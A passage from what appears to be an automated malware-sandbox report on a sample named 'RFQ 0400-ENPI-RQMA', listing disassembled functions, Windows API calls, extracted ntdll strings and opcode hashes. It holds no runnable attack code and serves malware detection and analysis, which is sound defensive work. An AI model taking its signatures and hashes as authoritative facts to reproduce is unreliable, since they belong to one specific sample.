                                                                                      • Instruction ID: 28da6497efbab91fddcaddee6dcc59dcba5a5150a74096bf66e05214206e21d5
                                                                                      • Opcode Fuzzy Hash: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                      • Instruction Fuzzy Hash: A4E06DB2640208BBD610EE99DC41EAB33ACEFCA710F000019F909A7242C670B9108AB9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0042B553 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 348 42b553-42b597 call 404933 call 42c2f3 RtlAllocateHeap
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(?,0041DEAB,?,?,00000000,?,0041DEAB,?,?,?), ref: 0042B592
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                      • Instruction ID: 1e45151d5ae518e03348f57204b76deaae3a37f6371d957f2058fa57962241ea
                                                                                      • Opcode Fuzzy Hash: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                      • Instruction Fuzzy Hash: A8E06DB1604244BBD614EE99DC41EAF37ACEFC6710F000019F908A7242C670B91086B9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0042B5F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 358 42b5f3-42b62f call 404933 call 42c2f3 ExitProcess
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(?,00000000,?,?,A337B7DB,?,?,A337B7DB), ref: 0042B62A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: 2759363570b55ec80a9c2bbdb714e3a733575c6f342d5e77988da5f6202b6134
                                                                                      • Instruction ID: 5260f22870e994c6374de7522158ff438fff32bc85833648b073e817e0388f48
                                                                                      • Opcode Fuzzy Hash: 2759363570b55ec80a9c2bbdb714e3a733575c6f342d5e77988da5f6202b6134
                                                                                      • Instruction Fuzzy Hash: 5EE04F72600214BBD220AA6ADC41F9B775CDFC5714F004469FA0CA7246CAB5B90186B4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 363 1402c0a-1402c0f 364 1402c11-1402c18 363->364 365 1402c1f-1402c26 LdrInitializeThunk 363->365
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1e320a9ea66599f702d2d6d06155f93e89861376777ee25ace27e05de27ef9de
                                                                                      • Instruction ID: f7ae57726dff1accf26e7671f30ec185056b83aacb99261c53af988e5ef58f91
                                                                                      • Opcode Fuzzy Hash: 1e320a9ea66599f702d2d6d06155f93e89861376777ee25ace27e05de27ef9de
                                                                                      • Instruction Fuzzy Hash: BBB09B729455C5C6DA12E764460CB17790077D1741F15C077D3030697F8778C1D1E275
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 01442349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-2160512332
                                                                                      • Opcode ID: b6dcdf71b19df8c2e5a7a560cc7eabf0b739a353064f7258061398de8faf61fd
                                                                                      • Instruction ID: 36f1a6b6b415294cb149a845d3cf68390ba879e0512bb520b5686c3483b1019e
                                                                                      • Opcode Fuzzy Hash: b6dcdf71b19df8c2e5a7a560cc7eabf0b739a353064f7258061398de8faf61fd
                                                                                      • Instruction Fuzzy Hash: A8929D71604342ABF721DF19D880F6BBBE8BB84754F04492EFA94973A1D7B0E845CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014712ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                      • API String ID: 0-3591852110
                                                                                      • Opcode ID: 9104c1882ab261005489cf925d936c631461052ad47cf9f15c6df1842c555b86
                                                                                      • Instruction ID: 123d01f4b94d55de282362692964d3dd7c2eb4ccd083fd5f1d1d6a8efde4d599
                                                                                      • Opcode Fuzzy Hash: 9104c1882ab261005489cf925d936c631461052ad47cf9f15c6df1842c555b86
                                                                                      • Instruction Fuzzy Hash: CC127D30600642DFE7258F69C485BFABBF5FF19B14F18845AE5868B761E734E881CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013BD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                      • API String ID: 0-3532704233
                                                                                      • Opcode ID: 78295b6277ce7bfdfb5b9a8e640f613cc99adfb96474f484587a7e812ae32f47
                                                                                      • Instruction ID: 6e2d50ba389951ea7fd234c0686ebbf1ba80019b915264eacc43e9633a63a961
                                                                                      • Opcode Fuzzy Hash: 78295b6277ce7bfdfb5b9a8e640f613cc99adfb96474f484587a7e812ae32f47
                                                                                      • Instruction Fuzzy Hash: C7B1BE719083559FC711DF68C480BABBBE8AF8871CF05092EFA89D7650E734D9488B92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01459179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                      • API String ID: 0-3063724069
                                                                                      • Opcode ID: c653904b3b8e6403facd26b242d2a49243b215ca29d2f8ab73383e127e48735a
                                                                                      • Instruction ID: 8150370285fd77cdae46f60dc300f19b6f9bb0d687906db6b1d25de338adb63b
                                                                                      • Opcode Fuzzy Hash: c653904b3b8e6403facd26b242d2a49243b215ca29d2f8ab73383e127e48735a
                                                                                      • Instruction Fuzzy Hash: 2FD1C8B2804315EBD761DB54C880B6BBBE8AF9475CF44092EFE4897261E774CD48C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01470274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                      • API String ID: 0-1700792311
                                                                                      • Opcode ID: 3c676bf0206c2f1b7f6ae33e983b0c381e9bfde9823737ec729d28af6970b875
                                                                                      • Instruction ID: 5b6d39c7877282758af1200fb84d3fcac2713e2c2c41adf7eb5cceb469eb107a
                                                                                      • Opcode Fuzzy Hash: 3c676bf0206c2f1b7f6ae33e983b0c381e9bfde9823737ec729d28af6970b875
                                                                                      • Instruction Fuzzy Hash: CBD1DD31501686DFDB22DF69C490AEABBF1FF5A608F08805AF5459B762D7349981CB10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013BD08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • @, xrefs: 013BD2AF
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 013BD2C3
                                                                                      • @, xrefs: 013BD0FD
                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 013BD146
                                                                                      • @, xrefs: 013BD313
                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 013BD0CF
                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 013BD262
                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 013BD196
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                      • API String ID: 0-1356375266
                                                                                      • Opcode ID: 73973cfe046c59f2db34d7c813c38950c1358cda59c0f407c00264fc55c15b1e
                                                                                      • Instruction ID: 1037fa853a003b8881721e4a89410d32dd0c4e4b161a9ecce918ef454dfcb83e
                                                                                      • Opcode Fuzzy Hash: 73973cfe046c59f2db34d7c813c38950c1358cda59c0f407c00264fc55c15b1e
                                                                                      • Instruction Fuzzy Hash: 28A1C0719083469FD721DF65C484B9BBBE8BB94728F00492EF6889B251E774D908CF53
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013BF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-523794902
                                                                                      • Opcode ID: b22cf7d3c45d0dede7e87540f65acc69614e3ffd87a5df0619e30a2d32218b2f
                                                                                      • Instruction ID: 74282ab17dd1e5ad177bb5323dc75e1353f925d51611fd275d7461f69fa74718
                                                                                      • Opcode Fuzzy Hash: b22cf7d3c45d0dede7e87540f65acc69614e3ffd87a5df0619e30a2d32218b2f
                                                                                      • Instruction Fuzzy Hash: CC4213756043469FD716CF28C884BABBBE9FF84708F04456EEA858BB61E734D941CB12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013DB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                      • API String ID: 0-122214566
                                                                                      • Opcode ID: 95e624de7a5a859452aa5309c969e4120f8abcb1de6cb609f728a1b32221f6ea
                                                                                      • Instruction ID: dc536d5ef5a674c68b99749d831d6202428ac71fcc7b715852454cacd2577a6b
                                                                                      • Opcode Fuzzy Hash: 95e624de7a5a859452aa5309c969e4120f8abcb1de6cb609f728a1b32221f6ea
                                                                                      • Instruction Fuzzy Hash: 8DC16833A0021A9BDB258B69D881B7EFBA5BF56718F05406EED01AB395EB70CC44C390
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-792281065
                                                                                      • Opcode ID: 255412102268ea38f05b6c67e5655cbc58cc815ccf0a123d98935d9d0616302b
                                                                                      • Instruction ID: 22ab7ab39072c41f5c4f2924e78e6c3d53ead3eeb00e5f09cc2f9a3083cbdb26
                                                                                      • Opcode Fuzzy Hash: 255412102268ea38f05b6c67e5655cbc58cc815ccf0a123d98935d9d0616302b
                                                                                      • Instruction Fuzzy Hash: 0A916CB0B013159BEB35EF59D885BEA7BA5FF94B18F04412EEA007B7A1D7749802C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0146F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                      • API String ID: 0-1745908468
                                                                                      • Opcode ID: d06a779df479d8b2b7c768973a2ca5289c46189ec4eb836a9962f70cc679fff6
                                                                                      • Instruction ID: 9795e4206501608608f59b77295a1d6418582216f5f441b5df9e96a50f1f3f87
                                                                                      • Opcode Fuzzy Hash: d06a779df479d8b2b7c768973a2ca5289c46189ec4eb836a9962f70cc679fff6
                                                                                      • Instruction Fuzzy Hash: C7910D31A00641DFDB12DF69E4A0AAABBF5FF19708F18805EE5859B772CB349C45CB11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 0143031E
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014302E7
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014302BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                      • API String ID: 0-2474120054
                                                                                      • Opcode ID: 0dec0c2cc9e1186a060669f138afb97ec1213b4cabaf0053bb922146912312c7
                                                                                      • Instruction ID: 6ca152ccd52ee4e4fd5c54f91b811d948355a05083f8ff9fbbe41bf169be5076
                                                                                      • Opcode Fuzzy Hash: 0dec0c2cc9e1186a060669f138afb97ec1213b4cabaf0053bb922146912312c7
                                                                                      • Instruction Fuzzy Hash: 49E1A1306047519FE725CF28C888B2ABBE4BB88328F140A5EF5958B7E1D7B5D945CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013E51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 013E5352
                                                                                      • Kernel-MUI-Language-SKU, xrefs: 013E542B
                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 013E527B
                                                                                      • WindowsExcludedProcs, xrefs: 013E522A
                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 013E5247
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                      • API String ID: 0-258546922
                                                                                      • Opcode ID: c618e2a26fef410a709eeed158abd1575b65cfd9e3421f7d02593658dd53b13c
                                                                                      • Instruction ID: 7a576a3674143c4c5b3fcb021b3fb0e2e506783bb6a01709f1bd302c4e0ec2d0
                                                                                      • Opcode Fuzzy Hash: c618e2a26fef410a709eeed158abd1575b65cfd9e3421f7d02593658dd53b13c
                                                                                      • Instruction Fuzzy Hash: 39F14D76D00229EFCF12DFA9C984AEEBBF9FF18658F55006AE501E7250D7709E018B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013D70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      • Opcode ID: 8c1aa99d575a9eb615245ae5c82738ae8e65b4bfd1b6df781624a2327101b045
                                                                                      • Instruction ID: 017b704799ad1c6f38b5e37b956cd0bd9a6e4a71aa48b0bec23b92d52c58a9f8
                                                                                      • Opcode Fuzzy Hash: 8c1aa99d575a9eb615245ae5c82738ae8e65b4bfd1b6df781624a2327101b045
                                                                                      • Instruction Fuzzy Hash: 7D13BE72A00259DFEB25CF68D8807A9BBF1FF59308F1481ADD949AB381D734A945CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013D1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-3570731704
                                                                                      • Opcode ID: b61dfceb239dc5bd1dc2563c691763a939447955e5a057e38aa997bd6f68b24a
                                                                                      • Instruction ID: a453e11fcc3d8a7f7d828383a8d0bc24149359157156e656e9fdac0c1eb78423
                                                                                      • Opcode Fuzzy Hash: b61dfceb239dc5bd1dc2563c691763a939447955e5a057e38aa997bd6f68b24a
                                                                                      • Instruction Fuzzy Hash: 38926D72A00229CFEB25CF29DC40BAAB7B5BF45314F1581EAD949AB391D7709E80CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                      • API String ID: 0-379654539
                                                                                      • Opcode ID: 63298a0dea42014dea893bc9b5dd2e2a0685240388100fd579e3c2167859da42
                                                                                      • Instruction ID: a57fecefd6d0c09ef486cc16a0d577316d96707b2456bf7f3858f189db32e78c
                                                                                      • Opcode Fuzzy Hash: 63298a0dea42014dea893bc9b5dd2e2a0685240388100fd579e3c2167859da42
                                                                                      • Instruction Fuzzy Hash: F9C1897410838ACFD711DF59C044B6AB7E4BB94B08F00896EF9969B750E774CD49CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • @, xrefs: 013F8591
                                                                                      • LdrpInitializeProcess, xrefs: 013F8422
                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013F855E
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 013F8421
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-1918872054
                                                                                      • Opcode ID: b2ce917e28f2096573189ac670c8fb78f3677e4c2d3e7531bc8209d9df856721
                                                                                      • Instruction ID: 5b4974d8a65780a2d6f18ee69dc47abd5bed10f5c56fe3d59f6970cbdcc95239
                                                                                      • Opcode Fuzzy Hash: b2ce917e28f2096573189ac670c8fb78f3677e4c2d3e7531bc8209d9df856721
                                                                                      • Instruction Fuzzy Hash: 29918171508345AFDB22EF26CC44FABBAECBF94758F40096EFA8896191D374D904CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013E15F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • MZER, xrefs: 013E16E8
                                                                                      • LdrpCompleteMapModule, xrefs: 0142A590
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 0142A59A
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 0142A589
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1409021520
                                                                                      • Opcode ID: 79236c220ad33d04a7b8d9079c3ef2bfb69418cf82ec810fa13eb34ce8559a51
                                                                                      • Instruction ID: 8cd238d4697fd1d33d4a5d030bfdc560f20d0a9f980980e377569f6ef4de50a9
                                                                                      • Opcode Fuzzy Hash: 79236c220ad33d04a7b8d9079c3ef2bfb69418cf82ec810fa13eb34ce8559a51
                                                                                      • Instruction Fuzzy Hash: 465125716007559BEB22CB5CC948B667BE8FF00728F5805A9EE519BBE2D774E980CF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014711A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                      • API String ID: 0-336120773
                                                                                      • Opcode ID: d95ba914374d6ab8d9f477d70abd0e3c54c787aed278390b5bcfb74444554700
                                                                                      • Instruction ID: f32e1774a92e77948d42e4346075e8e5e9a5aa58457c61d16cee2b4d6db89f8d
                                                                                      • Opcode Fuzzy Hash: d95ba914374d6ab8d9f477d70abd0e3c54c787aed278390b5bcfb74444554700
